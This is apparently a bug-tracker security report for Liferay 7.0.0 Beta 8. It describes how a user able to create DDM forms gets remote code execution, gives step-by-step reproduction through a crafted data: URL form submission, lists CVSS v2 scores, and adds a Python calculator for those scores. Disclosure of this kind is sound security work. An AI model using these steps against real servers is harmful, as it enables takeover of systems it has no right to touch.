Details

    • Story Points:
      1
    • Fix Priority:
      4

      Description

      Any user with permission to create a DDM form can achieve full remote code execution (RCE) on the server.

      Steps to reproduce:
      1. Create a new user, test2.
      2. Sign in as test2.
      3. Get the current p_auth token, for example: VQJZvnU7
      4. Get the groupId of test2's personal site, for example: 20910
      5. Copy and paste the following into the browser URL bar:

      data:text/html;base64,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

      6. Fill in the obtained p_auth and groupId parameters and submit the form; a new "Remote Code Execution Form" should be created.
      7. Go to the user's public pages (http://localhost:8080/web/test2).
      8. Add a Forms portlet and configure it to display "Remote Code Execution Form".
      9. Fill in any value and submit the form.

      Expected result: no "Remote Code Execution!" message in the server logs.
      Actual result: a "Remote Code Execution!" message appears in the server logs.


      CVSS v2 Base Score: 8.5
      CVSS v2 Temporal Score: 7.7
      CVSS v2 Vector: (AV:N/AC:M/Au:S/C:C/I:C/A:C/E:P/RL:U/RC:C)
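
      The scores above can be checked against the CVSS v2 equations. The following Python is an added worked example and is not part of the original issue or of Liferay's code: it parses a v2 vector, computes the base and temporal scores from the specification's metric weights with the specification's round-half-up to one decimal, and accepts E:P as an alias for the specification's E:POC, since that is how the vector on this issue is written. Temporal metrics that are absent count as ND (weight 1.0), so a base-only vector yields a temporal score equal to its base score.

```python
"""CVSS v2 base and temporal scoring from a vector string (added example)."""
from decimal import Decimal, ROUND_HALF_UP

# Metric weights from the CVSS v2 specification, kept as Decimal strings so
# the arithmetic is exact and rounding matches the spec (half up).
_WEIGHTS = {
    "AV": {"L": "0.395", "A": "0.646", "N": "1.0"},
    "AC": {"H": "0.35", "M": "0.61", "L": "0.71"},
    "Au": {"M": "0.45", "S": "0.56", "N": "0.704"},
    "C": {"N": "0.0", "P": "0.275", "C": "0.660"},
    "I": {"N": "0.0", "P": "0.275", "C": "0.660"},
    "A": {"N": "0.0", "P": "0.275", "C": "0.660"},
    # Temporal metrics. "P" is accepted as an alias for "POC" because some
    # trackers (this issue included) write E:P for proof-of-concept.
    "E": {"U": "0.85", "POC": "0.9", "P": "0.9", "F": "0.95", "H": "1.0", "ND": "1.0"},
    "RL": {"OF": "0.87", "TF": "0.90", "W": "0.95", "U": "1.0", "ND": "1.0"},
    "RC": {"UC": "0.90", "UR": "0.95", "C": "1.0", "ND": "1.0"},
}

_BASE_METRICS = ("AV", "AC", "Au", "C", "I", "A")


def _round1(x):
    """round_to_1_decimal as defined by CVSS v2 (half up, not banker's)."""
    return x.quantize(Decimal("0.1"), rounding=ROUND_HALF_UP)


def parse_vector(vector):
    """Parse '(AV:N/AC:M/.../RC:C)' into {metric: Decimal weight}.

    Parentheses are optional. Unknown metrics or values raise ValueError,
    as does a vector that omits any of the six base metrics.
    """
    weights = {}
    for part in vector.strip().strip("()").split("/"):
        metric, _, value = part.partition(":")
        if metric not in _WEIGHTS or value not in _WEIGHTS[metric]:
            raise ValueError(f"unknown metric or value: {part!r}")
        weights[metric] = Decimal(_WEIGHTS[metric][value])
    missing = set(_BASE_METRICS) - set(weights)
    if missing:
        raise ValueError(f"base metrics missing: {sorted(missing)}")
    return weights


def cvss2_scores(vector):
    """Return (base_score, temporal_score) as floats rounded to one decimal."""
    w = parse_vector(vector)
    one = Decimal(1)
    impact = Decimal("10.41") * (one - (one - w["C"]) * (one - w["I"]) * (one - w["A"]))
    exploitability = Decimal(20) * w["AV"] * w["AC"] * w["Au"]
    f_impact = Decimal(0) if impact == 0 else Decimal("1.176")
    base = _round1(
        (Decimal("0.6") * impact + Decimal("0.4") * exploitability - Decimal("1.5")) * f_impact
    )
    # Temporal score multiplies the *rounded* base score, per the spec.
    temporal = base
    for metric in ("E", "RL", "RC"):
        temporal *= w.get(metric, one)
    return float(base), float(_round1(temporal))


if __name__ == "__main__":
    # Vector from this issue; expected 8.5 base and 7.7 temporal.
    print(cvss2_scores("(AV:N/AC:M/Au:S/C:C/I:C/A:C/E:P/RL:U/RC:C)"))
```

      The 8.5 comes from a full confidentiality, integrity and availability impact (Impact = 10.0) combined with network access, medium complexity and single authentication (Exploitability = 6.83); the 7.7 is that base score times 0.9 for a proof-of-concept exploit with no remediation and confirmed reports.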
Packages

    • Version Package:
      7.0.0 Beta 8